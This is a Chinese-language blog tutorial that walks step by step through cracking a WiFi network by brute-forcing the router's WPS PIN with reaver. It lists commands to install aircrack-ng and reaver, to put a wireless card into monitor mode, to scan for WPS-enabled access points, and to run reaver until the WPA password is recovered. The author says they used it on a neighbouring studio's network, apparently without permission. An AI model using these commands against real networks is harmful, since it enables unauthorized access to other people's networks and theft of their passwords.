使用reaver傻瓜式破解wifi之利用路由器WPS漏洞
跟这篇破解教程一样,网上破解教程多是基于路由器的WPS漏洞破解,但是这样的路由器只占少数。一般wifi是依据WPA/WPA2加密的,因此想要破解一般的wifi,还得破解这个协议,虽然近期这个协议也被破解了,不过也是很不容易的。
刚入门破解,不是很熟悉,在网上找各种破解资料,终于破解成功了临近工作室的wifi,沾沾自喜~
本文破解wifi针对一些路由器的WPS(Wi-fi protected setup)漏洞,尝试很多次抓包PIN码,破解2-3天,正常来说是一定能抓到正确的PIN码的。
一个路由器对应唯一的MAC和PIN,而一旦得到MAC和PIN,通过reaver工具,路由密码等信息就可以很快得出来。
1.安装依赖包:
sudo apt-get install -y libpcap-dev
libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion
2.安装aircrack-ng:
svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
cd aircrack-ng/
make (aircrack-ng源码安装参考http://www.tuicool.com/articles/MfUjii)
sudo make install
3.安装reaver:
在https://pan.baidu.com/s/1kUdvM1D下载reaver
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
sudo make install
4.如果安装成功后,会有airmon-ng,airodump-ng,reaver等命令可用(如果没有ethtool,要安装:apt-get install ethtool)
5.开始破解:(参考http://www.she.vc/article/18-108334-0.html http://www.kali.org.cn/thread-20995-1-1.html)
(1)sudo airmon-ng check kill (关闭进程,部分进程可能影响到后续的操作)
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'PID Name431 avahi-daemon446 dhcpcd470 avahi-daemon512 wpa_supplicant
(2)sudo airmon-ng
(3)sudo airmon-ng start wlan1
(4)sudo airmon-ng start wlan1mon (开启网卡,将网卡转换成混杂模式)
PHY Interface Driver Chipsetphy0 wlan0 brcmfmac_sdio Broadcom 43430Missing nexutil, cannot switch to monitor mode.
phy1 wlan1mon mt7601u Ralink Technology, Corp. (mac80211 monitor mode already enabled for [phy1]wlan1mon on [phy1]10)
(5)sudo airodump-ng wlan1mon (查看ap信号强度,破解的wifi信号越强越好)
(6)wash -i wlan1mon -C (查看支持wps的ap)(一种说法是:MB是54e.的可破解,54e不可破解)
6.(正式破解,在root下)使用reaver:
因状况调整参数:MAC即BSSID的值,-c后面的数字是CH的值。
目标信号非常好:
reaver -i wlan1mon -b MAC -a -S -vv -d0 -c 1
目标信号普通:
reaver -i wlan1mon -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般:
reaver -i wlan1mon -b MAC -a -S -vv -d5 -c 1
7.每60s重新破解一次,等待三天,密码将会出来
8.最终得到PIN码(WPS PIN)和密码(WPA PSK),如果密码 被改,只要reaver加上-p命令
(reaver -i wlan1mon -b MAC -p PIN码 -vv),密码又能秒出; 但如果PIN码被改,就要重新破解了。
9.破解完成后,将网卡转回正常状态(airmon-ng stop wlan1mon)
备注:reaver时可以随时停止,它自己会保存进度
升级破解固件http://netsecurity.51cto.com/art/201105/264844_all.htm
使用reaver傻瓜式破解wifi之利用路由器WPS漏洞相关推荐
- 渗透之——使用reaver傻瓜式破解wifi之利用路由器WPS漏洞
跟这篇破解教程一样,网上破解教程多是基于路由器的WPS漏洞破解,但是这样的路由器只占少数.一般wifi是依据WPA/WPA2加密的,因此想要破解一般的wifi,还得破解这个协议,虽然近期这个协议也被破 ...
- Kali如何使用Reaver破解Wi-Fi网络的WPA/WPA2密码
首先,我们需要在虚拟机VMware中安装kali系统,关于如何安装kali系统,我的博客里也有介绍:然后要准备一个USB无线网卡,我用的是小米随身wifi. 我们要先了解Reaver的原理:它利用了W ...
- 破解WIFI密码的最简单方法
个人觉得破解wifi密码最简单的, 就是用kali 下的reaver工具了. 挂着一个晚上, 如果没有错误, 密码应出来了. 当然, 你要先确定你的网卡的芯片可以用于WIFI破解, 传送门 . 第一步 ...
- Kali Linux使用Aircrack破解WiFi密码(wpa/wpa2)
注意:破解别人WiFi密码是违法的所以我用我自己家WiFi来测试,我们的目的是知道攻击的原理,来防范这种攻击. 设备需求: 安装kali Linux的计算机(不能用vmware虚拟机,虽然台式机可以用 ...
- ML之ECS:利用ECS的PAI进行傻瓜式操作机器学习的算法
ML之ECS:利用ECS的PAI进行傻瓜式操作机器学习的算法 目录 ECS的PAI的简介 优质.丰富的机器学习算法 ECS的PAI的操作攻略 ML案例 ECS的PAI的简介 阿里云机器学习 ...
- 使用计算机录音,傻瓜式录音,教你如何利用电脑录音!
不知道大家在平时会不会用到电脑录音? 反正小编是很经常需要,所以在这里将方法分享给大家,绝对精彩! 电脑对于现在的办公来说至关重要,很多人对电脑的配置啥的都有很高的要求,无非就是想要利用电脑处理一些简 ...
- 思路+源码,利用Python破解WIFI密码详解,100M的字典已备好
前言 WIFI破解,Python程序员必学技能.WIFI已经完全普及,现在Python程序员没网,走到哪里都不怕! 很多人学习python,不知道从何学起. 很多人学习python,掌握了基本语法过后 ...
- wince车机可以连接电脑吗_想在WinCE车机上运行凯立德实时路况版吗?那就进来看看,让你一键傻瓜式联网...
如果你的WinCE车机可以联网的话,那就可以运行凯立德C3524这个实时路况的版本,可以使用K云功能,还可以获取实时路况信息,并且可以显示附近的K友信息,让你方便组队出游. 市面上的WinCE车机,大 ...
- 【NLP傻瓜式教程】手把手带你RCNN文本分类(附代码)
继续之前的文本分类系列 [NLP傻瓜式教程]手把手带你CNN文本分类(附代码) [NLP傻瓜式教程]手把手带你RNN文本分类(附代码) [NLP傻瓜式教程]手把手带你fastText文本分类(附代码) ...
最新文章
- python雷达和柱形图_Python Pygal常见数据图(折线图、柱状图、饼图、点图、仪表图和雷达图)详解...
- python无参数装饰器_Python装饰器(不带参数)
- [html] 精确获取页面元素位置的方式有哪些?
- JAVA面向对象明星类
- python使用pip安装_Python | 如何用pip安装模块和包
- [原]解决win2003 iis6 部署MVC 无法访问 403 的问题
- vcpkg 详细介绍
- MOOC:模式识别——贝叶斯决策理论
- K-Means算法与FCM算法
- C#程序设计与应用课程教学总结:自评与改进
- [SugerTangYL] 时钟管理(分频器、倍频器、锁相环)Verilog
- 新手怎样安装win10系统?win10系统安装教程解读
- rabbitmq-channel断网后没有断开情况记录
- 虚拟机 Linux 系统自定义桌面分辨率且重启后保持不变
- 在被线上大量日志输出导致性能瓶颈毒打了很多次之后总结出的经验
- Unity3D制作触屏手机滑动动效果
- OpenCV学习——基本操作之绘制几何图形
- MeterSphere案例分享丨易盛信息MeterSphere接口测试使用经验
- Python零基础学习
- 数据包从物理网卡流经 Open vSwitch 进入 OpenStack 云主机的流程